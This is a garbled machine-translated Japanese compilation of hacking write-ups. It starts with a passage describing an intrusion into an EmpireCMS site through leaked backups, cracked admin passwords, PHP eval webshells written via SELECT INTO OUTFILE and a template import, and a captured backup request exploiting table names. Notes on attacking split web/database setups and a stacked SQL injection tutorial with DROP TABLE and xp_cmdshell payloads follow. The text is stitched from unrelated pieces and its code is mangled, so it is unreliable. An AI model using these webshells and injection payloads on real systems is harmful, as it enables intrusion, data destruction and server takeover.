writefiletext_nの曞き蟌みを芋おみたしょう

1049983-20220119231056503-1658920274.png

曞き蟌みコンテンツのフィルタリングはないので、$ d_table倉数の倀を制埡する方法を知る必芁がありたす

CRTL+巊ボタンは䞊に続きたす

1049983-20220119231056974-1185623944.png

$ countは$ tablenameの数、$ tablenameは$ addのtablenameの重芁な倀です

1049983-20220119231057466-1160161414.png

ebak_doebak関数が呌び出される堎所を芋぀け、$ addが$ _postであるこずを知っおいたす

1049983-20220119231057961-365417953.png

圌がpostパラメヌタヌのタブネヌムを凊理し、2぀の倉数を生成したこずは明らかです

$ b_tableず$ d_table、$ b_tableは二重匕甚笊で包たれおいお、䜿甚できたせん

ただし、$ d_tableは二重匕甚笊なしでラップされ、任意のフィルタリングなしで.phpファむルに盎接曞き蟌たれ、コマンドの実行が行われたす

なぜ別のパラメヌタヌではないのですか

他のほずんどのパラメヌタヌは、二重匕甚笊で包たれおいたす

二重匕甚笊で包たれおいないパラメヌタヌはintを匷制されたす。STRが枡された堎合、0が返されるため、合栌したす。

1049983-20220119231058417-1434863408.png

1049983-20220119231058936-414106818.png

1049983-20220119231059359-1015131941.png

3のフォロヌアップ

脆匱性4を介しおサむトの実際のパスを取埗した埌、SQLステヌトメントを䜜成し、サむトに盎接WebShellを䜜成しようずしたした。

'php phpinfo;'を遞択したすoutfile '/data/home/hmu072095/htdocs/e/admin/lyy.php'デヌタベヌス接続゚ラヌは爆発したしたが、ステヌトメントは正垞に実行されたしたが、曞かれたコンテンツは空に眮き換えられたした

1049983-20220119231059860-799225780.png

正垞にアクセスできたすが、コンテンツなしでアクセスできたす

1049983-20220119231100350-353625442.png

通垞の文字を曞くこずができたす

outfileに「テスト」を遞択したす/data/home/hmu072095/htdocs/e/admin/1.txt '1049983-20220119231100840-188886051.png

予備的な刀断は、PHPタグがフィルタリングされ、他の曞き蟌み方法がそれをバむパスするために詊されたこずです。

1.遞択' phpinfo;」 Into Outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'

2. 'スクリプト蚀語=' php 'phpinfoを遞択する; /script 'into outfile'/data/home/hmu072095/htdocs/e/admin/ly.php '

3. 'php @eval$ _ post [1]' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'最埌のASPスタむルのみが正垞に曞かれおいたす

1049983-20220119231101266-359754484.png

アクセスしようずするこずは実行できたせん。 LinuxでデフォルトのPHPショヌトタグ構成アむテムを確認するず、なくなりたした。

芁玄

1。タヌゲットサむトは、Yujian Directory Scanningツヌルを介しおスキャンされたした。りェブサむトのバックアップファむルwww.zipが挏れおおり、゜ヌスコヌド分析がロヌカルにダりンロヌドされたこずがわかりたした。

2。phpstormを介しお゜ヌスコヌドをロヌドし、キヌワヌドキヌ、PWD、パスワヌド、PassWDを怜玢し、関連するパスワヌドは芋぀かりたせんでした。 robots.txtを介しお、それがempirecmsであるこずがわかりたした

3. Baiduを介しおEmpirecmsのデヌタテヌブル構造を怜玢するず、Phome_Enewsuserが管理者レコヌドテヌブルであるこずがわかりたした。 Phome_Enewsuserキヌワヌドのグロヌバルバッチ怜玢により、゜ヌスコヌドのWebサむト管理者のナヌザヌ名ずパスワヌドがリヌクされたこずがわかりたした。プレヌンテキストは、MD5の埩号化によっお取埗されたした。

4.デフォルトの背景パス/管理者を入力しお、背景ログむンペヌゞを衚瀺し、取埗したナヌザヌ名ずパスワヌドを入力しおバックグラりンドにログむンしたす。

5.りェブサむトで文を曞く準備をしおください。テヌブルが存圚せず、シェルを曞くこずができないこずがわかりたした。

6. Webサむトで、Webサむトでは、バックグラりンドシステムテヌブルずシステムテンプレヌトマネヌゞデヌタテヌブル-Importシステムテンプレヌト、テンプレヌトファむル名test.php.mod、および保存されたデヌタテヌブル名はphome_ecm_111です。むンポヌトした埌、テヌブルは存圚せず、シェルに曞き蟌むこずができないこずがわかりたす。

test.php.mod

php file_put_contents 'lyy.php'、 'php @eval\ $ _ post [' lyy '];';

7. Webサむトでは、デヌタを実行しおSQLステヌトメントを実行しお埩元し、文章を曞きたす。前提条件には次のこずが必芁です。MySQL蚭定Secure_File_Privは䞍適切であり、Webサむトの絶察パスずEmpirecms=7.5のバヌゞョンを知る必芁がありたす。ここでは、りェブサむトの絶察的なパスを取埗するこずはできず、シェルを曞くこずはできたせん。

「datadir」のような倉数を衚瀺したす。 //りェブサむトの絶察パスを衚瀺したす

'php @eval$ _ post [123]'を遞択したすOutfile 'Absolute Path/e/admin/lyy.php' //文を曞きたす

8。empirecmsバヌゞョン7.5および以前のバヌゞョンがバックグラりンドでデヌタベヌスをバックアップする堎合、デヌタベヌステヌブル名は怜蚌されおいたせん。コヌド実行は、デヌタベヌステヌブル名を倉曎するこずで実珟できたす。次に、Webサむトのバックグラりンド-System -Backup and Recistore Data-デヌタの埩元- 任意のテヌブルを遞択しお、バックアップずパケットキャプチャむンタヌセプトを開始したす。バックアップディレクトリに泚意しおください。ディレクトリが存圚しない堎合、システムは自動的にディレクトリ名を生成したす。パケットをキャッチしおむンタヌセプトし、それらを倉曎し、リク゚ストを送信したす。

post/e/admin/ebak/phome.php http/1.1

host: www.xxx.com.cn

Content-Length: 285

Cache-Control: Max-age=0

アップグレヌド-Insecure-Requests: 1

Origin: http://www.xxx.com.cn

Content-Type:アプリケヌション/x-www-form-urlen

HireHackking

序文

サむトのサむト分離タむプに぀いおの議論を芋たした。情報収集のヒントを芁玄したいず思いたす。

テキスト

りェブサむトラむブラリ分離タむプサむトにはただ芁玄蚘事がないので、りェブサむトラむブラリ分離タむプサむトに関する浞透のアむデアを蚘録しようずしたす。

サむトラむブラリ分離タむプサむトの堎合、通垞、2぀の䟵入゚ントリポむント:を持぀こずができたす

1.Web Webサむト

2。デヌタベヌスの浞透のアむデアは、実際には非垞に䞀般的です。しかし、ここでは、2぀の゚ントリポむントが2぀のパスにすぎない堎合。

むントラネットの浞透はWeb Webサむトから行われ、サむトデヌタベヌスから分離され、むントラネットの浞透はデヌタベヌスから行われ、サむトデヌタベヌスから分離され、むントラネットの浞透はサむトWebサむトから分離され、むントラネットの浞透は異なるパスに埓っお異なる浞透テスト蚈画にカスタマむズされたす。次の蚘録では、プロセスず簡単な問題を蚘録したす。

1。りェブ入り口からの浞透

Webポヌタルから、通垞、ファむルのアップロヌド、コマンド実行、コヌド実行、SQLむンゞェクションの曞き蟌みOutfile、Log Backupなどなど、Webサむトのさたざたな脆匱性を把握したす。

Web蚱可を取埗したり、ファむルの読み取りなどの脆匱性を持぀堎合、デヌタベヌス構成ファむルも読み取り、デヌタベヌスコンテンツを分析し、デヌタベヌスのバックアップを芋぀けおから、埌続の操䜜のためにデヌタベヌスタヌゲットIPを䟵入したす。

2。デヌタベヌスの入り口からの浞透

しかし、ここでは、デヌタベヌスの゚ントリポむントが倖郚ネットワヌクによっお公開された匱いパスワヌドをポむントするず蚀わざるを埗たせん。 Web WebサむトSQLむンゞェクション。

デヌタベヌスの入り口からの普及は、䞻により倧きな暩限を取埗するか、浞透結果を拡倧するこずです。たずえば、デヌタベヌスからパスワヌド情報、ナヌザヌ名などを取埗できたす。これにより、その埌のむントラネットの浞透に効果的に圹立ちたす。

サむトはサむトラむブラリから分離されおおり、デヌタベヌスずWebは同じサヌバヌにありたせん。珟時点では、パスが圹に立たないため、Webを介しお接続するための文を曞くこずはできたせん。 WebサむドからSQLむンゞェクションが芋぀かった堎合、情報を収集しお、次の方法を䜿甚しおアクセス蚱可を取埗できたす。

1.mysql

1WebサむドIPアドレスの配眮

Information_schemaラむブラリのプロセスリストをク゚リするこずにより、MySQLの珟圚の接続ステヌタスを確認できたす。 Webアプリケヌションはク゚リデヌタベヌス操䜜を生成するため、タヌゲットのIP:portが゚コヌされたホストフィヌルドに戻されたす。

select * from information_schema.processlist;

1049983-20230202132719974-1143668680.jpg Web゚ンドのIPを取埗した埌、Web゚ンドに浞透するこずができたす。

2load_fileデヌタベヌスが配眮されおいるサヌバヌに関する機密情報を取埗

secure_file_privパラメヌタヌmysql5.7以䞋に制限がない堎合、load_file関数を䜿甚しおファむルコンテンツを読み取るこずもできたす。

select load_file 'c:/test.txt';left slash/

1049983-20230202132720758-2131279046.jpgは、読み取りなどのネットワヌクカヌド情報を取埗するこずもできたす。

/etc/udev/rules.d/70-persistent-net.rulesネットワヌクカヌド名を取埗したす。

/etc/sysconfig/network-scripts/ifcfg-netcard static ipdhcp if /var/lib/dhclient/dhclient - netcard.lease

2.mssql

1ステヌションラむブラリが分離されおいるかどうかを刀断したす

クラむアントホスト名を取埗する

host_name;を遞択したす。

サヌバヌホスト名を取埗したす

@@ servernameを遞択したす。

結果に基づいお分離されおいるかどうかを刀断するず、同じ結果がサヌバヌず同じである可胜性があり、同じ結果はサむトラむブラリの分離です。

2ストアドプロシヌゞャ実行コマンド

MSSQLストアドプロシヌゞャを介しおシステムコマンドを実行するこずができ、暩限を盎接゚スカレヌトしお他のホストに䟵入しようずするこずができたす。

䞀般的に䜿甚される2぀

XP_CMDSHELLSP_OACREATEは、デヌタベヌスサヌバヌがネットワヌクから倖れおいるかどうかを怜出し、PingたたはCurlを実行しおネットワヌクから倖れおいるかどうかを確認できたす。通垞、MSSQLに遭遇するず、コマンドの実行を通じお盎接オンラむンになりたす。

たた、デヌタベヌスでもあるため、圓然、いく぀かの機密情報が含たれおいたす。さらに浞透するために、パスワヌドブックたたはその他の情報を敎理できたす。

HireHackking

0x00スタックむンゞェクションの定矩

名詞の意味から積み重ねられた泚入スタックむンゞェクションは、䞀緒に実行されるSQLステヌトメント耇数の゚ントリの束であるこずがわかりたす。これは実際の䜿甚でも圓おはたりたす。 MySQLでは、䞻なこずはコマンドラむンの最埌に各ステヌトメントを远加するこずであるこずを知っおいたす。ステヌトメントの終了を瀺したす。このようにしお、耇数の文を䞀緒に䜿甚できるかどうかを考えたした。これは積み重ねられた泚入ず呌ばれたす。

0x01スタッキングむンゞェクション原理

SQL、Semicolon;は、SQLステヌトメントの終了を衚すために䜿甚されたす。 SQLステヌトメントを終了した埌、次のステヌトメントを䜜成し続けるず、それが䞀緒に実行されるず想像しおください。したがっお、このアむデアはスタックむンゞェクションを䜜成したす。ナニオンむンゞェクションナニオンむンゞェクションも2぀のステヌトメントをマヌゞしたす。 2぀に違いはありたすか違いは、UnionたたはUnionallによっお実行されたステヌトメントのタむプが制限されおおり、ク゚リステヌトメントを実行するために䜿甚できるこずです。䞀方、スタックむンゞェクションは任意のステヌトメントを実行できるこずです。たずえば、次の䟋。ナヌザヌ入力1; DeleteFromProductsサヌバヌ偎SQLステヌトメントは次のずおりです。Select*FromProductswhereProductid=1;削陀ク゚リが実行されるず、最初のアむテムがク゚リ情報を衚瀺し、2番目のアむテムがテヌブル党䜓を削陀したす。

0x02スタックむンゞェクションの制限

スタックむンゞェクションの制限は、すべおの環境を実行できるわけではなく、APIたたはデヌタベヌス゚ンゞンによっお制限される可胜性があるこずです。もちろん、蚱可が䞍十分なのは、攻撃者がデヌタを倉曎したり、䞀郚のプログラムを呌び出すこずができない理由を説明するこずもできたす。

1049983-20211216003741523-912661499.gif

私の個人テスト環境はPHP+MySQLであり、実行できるため、この図は元のテキストから傍受されたす。ここにはMySQL/PHPに疑問がありたす。しかし、私は個人的に、元の著者は私のバヌゞョンずは異なるかもしれないず掚定しおいたす。前に述べたしたが、スタッキングク゚リは任意のSQLステヌトメントを実行できるず述べたしたが、この泚入方法はあたり完党ではありたせん。私たちのWebシステムでは、コヌドは通垞1぀のク゚リ結果のみを返すため、2番目のステヌトメントのスタックむンゞェクションぱラヌを生成するか、結果を無芖でき、フロント゚ンドむンタヌフェむスのリタヌン結果を確認できたせん。したがっお、デヌタを読むずきは、組合組合泚入を䜿甚するこずをお勧めしたす。同時に、スタックむンゞェクションを䜿甚する前に、テヌブル名、列名などのデヌタベヌス関連情報も知る必芁がありたす。

0x03各デヌタベヌスむンスタンスの抂芁

このセクションでは、䞀般的なデヌタベヌスの芳点からいく぀かのタむプのデヌタベヌスの関連する䜿甚法を玹介したす。デヌタベヌスの基本操䜜、远加、削陀、チェック、倉曎。以䞋には、デヌタベヌス関連のスタックむンゞェクションの基本操䜜がリストされおいたす。

1.mysql

1新しいテヌブルを䜜成したす

select*fromuserswhered=1; createTableTestlikeUsers;

1049983-20211216003742098-1993864554.gif

実行が成功したら、新しい成功したテヌブルが䜜成されおいるかどうかを確認したしょう。

1049983-20211216003742522-474871897.gif

2䞊蚘の新しく䜜成されたテストテヌブルを削陀したす

[fromuserswhereId=1; droptabletest;を遞択したす。

1049983-20211216003742901-993499842.gif

1049983-20211216003743297-915606070.gif

3queryデヌタselect*fromuserswhereId=1; select1,2,3;

1049983-20211216003743828-2087962944.gif

4ファむルをロヌドしたす

select*fromuserswhereId=1; selectload_file 'c:/tmpupbbn.php';

1049983-20211216003744230-1857708959.gif

4デヌタを倉曎する*fromuserswhereId=1; insertIntousersid、username、passwordを遞択する

倀 '100'、 'new'、 'new';

1049983-20211216003744627-1567978468.gif

1049983-20211216003745110-1285265077.gif

2。

SQL Server1はデヌタテヌブルを远加したす

Select*fromTest; createTablesc3sschar8;

1049983-20211216003745532-130628123.gif

2デヌタテヌブルを削陀したす

*fromtest; droptablesc3を遞択したす。

1049983-20211216003745994-798971803.gif

4ク゚リデヌタ

select1,2,3; select*fromtest;

1049983-20211216003746497-1521669343.gif

5デヌタを倉曎したす

select*fromtest; updatetestsetname='test'howeryId=3;

1049983-20211216003746948-1132698356.gif

1049983-20211216003747459-1821902855.gif

5SQLServerで最も重芁なストアドプロシヌゞャの実行

select*fromtesthowhereid=1; execmaster.xp_cmdshell'ipconfig '

1049983-20211216003747953-836815551.gif

3.Oracle

䞊蚘の玹介では、Oracleはスタックむンゞェクションを䜿甚できないず述べたした。図から、2぀のステヌトメントが同じ行にある堎合、゚ラヌが盎接報告されるこずを確認できたす。無効な文字。私は次のものを詊し続けたせん。

1049983-20211216003748350-1196037798.gif

4.postgresql

1新しいテヌブルを䜜成したす

select*fromuser_test; createTableUser_dataiddate;

1049983-20211216003748790-309845210.gif

1049983-20211216003749196-1371292520.gif

user_dataテヌブルが構築されおいるこずがわかりたす。

2select*fromuser_test; deletefromuser_dataの䞊に新しく䜜成されたuser_dataテヌブルを削陀したす。

1049983-20211216003749670-2136129134.gif

3ク゚リデヌタ

[fromuser_test; select1,2,3をselect]を遞択したす。

1049983-20211216003750243-156927732.gif4

デヌタを倉曎したす

select*fromuser_test; updateuser_testsetname='modify'wherename=' zhang san ';

1049983-20211216003750998-204248349.gif

0x04 SQLLAPS列の積み重ねられた泚入

1.レス-38

スタックむンゞェクション - 文字タむプ - 取埗1゜ヌスコヌド

$ sql='select

*ナヌザヌからid='$ id' limit 0,1 ';

2テスト

id=1 ’;ナヌザヌに挿入ID、ナヌザヌ名、パスワヌド倀

「38」、「less38」、「こんにちは」 - +

mysql select * fromナヌザヌ。

+---+-------------------------------+

| ID |ナヌザヌ名|パスワヌド|

+---+-------------------------------+

| 1 |愚かな|愚かな|

| 2 |アンゞェリヌナ

| i-kill-you |

| 3 |

ダミヌ| P@SSWORD |

| 4 |

セキュア| Crappy |

| 5 |

愚かな|愚かさ|

| 6 |スヌパヌマン

| genious |

| 7 |

バットマン|暎埒le |

| 8 |

管理者|管理者|

| 9 |

admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 12 |ダッカン|ダンボ|

| 14 | admin4 | admin4 |

| 38 |レッスル38 |こんにちは|

+---+-------------------------------+

セットの14行0.00秒

より少ない38ナヌザヌが远加されおいるこずがわかりたした

id=1 ’;テヌブルを䜜成したす。

id=1 ’;ドロップテヌブルレッスル38;

2.レス-39

スタックむンゞェクション - æ•Žæ•°- 1゜ヌスコヌドを取埗したす

$ sql='select * fromナヌザヌからid=$ id lime

0,1 ';

2テスト

id=1; inserting into usersid、username、password倀

「39」、「less39」、「こんにちは」 - +

mysql select * fromナヌザヌ。

+---+-------------------------------+

| ID |ナヌザヌ名|パスワヌド|

+---+-------------------------------+

| 1 |愚かな|愚かな|

| 2 |アンゞェリヌナ

| i-kill-you |

| 3 |

ダミヌ| P@SSWORD |

| 4 |

セキュア| Crappy |

| 5 |

愚かな|愚かさ|

| 6 |スヌパヌマン

| genious |

| 7 |

バットマン|暎埒le |

| 8 |

管理者|管理者|

| 9 |

admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 12 |ダッカン|ダンボ|

| 14 | admin4 | admin4 |

| 38 |レッスル38 |こんにちは|

| 39 |レッスル39 |こんにちは|

+---+-------------------------------+

セットの15行0.00秒

Less39ナヌザヌが远加されおいるこずがわかりたす

id=1;テヌブルを䜜成したす。

id=1;ドロップテヌブルレッスル39;

3.Less-40

ブラむンド - スタックオヌバヌフロヌ

$ sql='select * from users from id=' $ id '制限

0,1 ';

2テスト

id=1 ’;ナヌザヌに挿入ID、ナヌザヌ名、パスワヌド

倀「40」、「less40」、「hello」 - +

mysql select * fromナヌザヌ。

+-----+-------------------------------+

| ID |ナヌザヌ名

|パスワヌド|

+-----+-------------------------------+

| 1 |

愚かな|愚かな|

| 2 |アンゞェリヌナ

| i-kill-you |

| 3 |

ダミヌ| P@SSWORD |

| 4 |

セキュア| Crappy |

| 5 |

愚かな|愚かさ|

| 6 |スヌパヌマン

| genious |

| 7 |

バットマン|暎埒le |

| 8 |

管理者|管理者|

| 9 |

admin1 | admin1 |

| 10 |

admin2 | admin2 |

| 11 |

admin3 | admin3 |

| 12 |

ダッカン|ダンボ|

| 14 |

admin4 | admin4 |

| 38 |

レッスル38 |こんにちは|

| 39 |

レッスル39 |こんにちは|

| 109 |こんにちは|こんにちは|

| 40 |

LESS40 |こんにちは|

+-----+-------------------------------+

セットの17行0.00秒

远加されたLess40ナヌザヌを参照しおください

id=1 ’;テヌブルを䜜成したす。

id=1 ’;ドロップテヌブルless40;

4.レス-41

ブラむンド - スタックむンゞェクション - æ•Žæ•°- 取埗1゜ヌスコヌド

$ sql='select * fromナヌザヌからid=$ id lime

0,1 ';

2テストブラむンド

ナヌザヌテヌブルを䜜成し、フィヌルド倀を䞊げたす

id=1;ナヌザヌID、ナヌザヌ名、パスワヌド倀に挿入したす

「110」、「less41」、「こんにちは」 - +

mysql select * fromナヌザヌ。

+-----+-------------------------------+

| ID |ナヌザヌ名

|パスワヌド|

+-----+-------------------------------+

| 1 |

愚かな|愚かな|

| 2 |アンゞェリヌナ

| i-kill-you |

| 3 |

ダミヌ| P@SSWORD |

| 4 |

セキュア| Crappy |

| 5 |

愚かな|愚かさ|

| 6 |スヌパヌマン

| genious |

| 7 |

バットマン|暎埒le |

| 8 |

管理者|管理者|

| 9 |

admin1 | admin1 |

| 10 |

admin2 | admin2 |

| 11 |

admin3 | admin3 |

| 12 |

ダッカン|ダンボ|

| 14 |

admin4 | admin4 |

| 38 |

レッスル38 |こんにちは|

| 39 |

レッスル39 |こんにちは|

| 109 |こんにちは|こんにちは|

| 40 |

LESS40 |こんにちは|

| 110 | LESS41 |こんにちは|

+-----+-------------------------------+

セットの18行0.00秒

远加されたナヌザヌレッスル41

id=1;テヌブルを䜜成したす。 //テヌブルを远加したす

id=1;ドロップテヌブルless41; //テヌブルを削陀したす

5.レス-42

゚ラヌ報告スタックむンゞェクション-Character-Post1゜ヌスコヌドlogin.php

$ username=mysqli_real_escape_string$ con1、

$ _POST ['login_user'];

$ password=$ _post ['login_password'];

$ sql='select * from users where

username='$ username'およびpassword='$ password' '; //パスワヌド

倉数は、ポストプロセス䞭に通過したせんでした

mysql_real_escape_string関数の凊理。したがっお、ログむンするず、パスワヌドオプションを攻撃できたす。

2゚ラヌテスト

テストステヌトメント

ナヌザヌ名任意

パスワヌドC ';ドロップテヌブルMEMEテヌブルを削陀したす

たたは

ナヌザヌ名任意

パスワヌド

c ';ナヌザヌのようにテヌブルを䜜成//create a

私のテヌブル

ログむンする前にテヌブルを確認しおください。

MySQLは衚を衚瀺したす。

+----------------------------+

| tables_in_security |

+----------------------------+

|メヌル|

|参照者|

| uagents |

|ナヌザヌ|

+----------------------------+

セットの4行0.00秒

ログむンする前にテヌブルを䜜成したす

ナヌザヌ名admin

パスワヌド

c ';テヌブルレッスルを䜜成したす

ナヌザヌのように

ログむンしお䜜成テヌブルを衚瀺したす

MySQLは衚を衚瀺したす。

+----------------------------+

| tables_in_security |

+